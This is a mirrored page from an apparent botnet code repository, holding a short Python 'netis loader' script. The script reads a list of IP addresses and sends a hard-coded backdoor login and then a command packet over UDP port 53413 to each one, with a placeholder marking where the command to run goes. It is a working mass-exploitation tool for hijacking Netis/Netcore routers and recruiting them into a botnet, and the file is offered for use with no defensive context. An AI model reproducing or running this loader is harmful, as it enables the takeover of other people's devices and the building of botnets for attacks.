mirror of https://github.com/threatland/TL-BOTS
36 lines
915 B
Python
36 lines
915 B
Python
#!/usr/bin/python
|
|
# netis loader
|
|
# by light
|
|
|
|
import threading, sys, time, random, socket, re, os
|
|
|
|
if len(sys.argv) < 2:
|
|
print "Usage: python "+sys.argv[0]+" <list>"
|
|
sys.exit()
|
|
|
|
loginpayload = "AAAAAAAAnetcore\x00"
|
|
commandpayload = "AA\x00\x00AAAA (PAYLOAD HERE)"
|
|
list = open(sys.argv[1], "r").readlines()
|
|
offline = 0
|
|
class netis(threading.Thread):
|
|
def __init__ (self, ip):
|
|
threading.Thread.__init__(self)
|
|
self.ip = str(ip).rstrip('\n')
|
|
def run(self):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
try:
|
|
print "\033[31m[\033[32m+\033[31m] \033[32mAttempting:\033[32m %s"%(self.ip)
|
|
s.sendto(loginpayload, (self.ip, 53413))
|
|
time.sleep(1.5)
|
|
s.sendto(commandpayload, (self.ip, 53413))
|
|
time.sleep(30)
|
|
except Exception:
|
|
pass
|
|
for ip in list:
|
|
try:
|
|
t = netis(ip)
|
|
t.start()
|
|
time.sleep(0.01)
|
|
except:
|
|
pass
|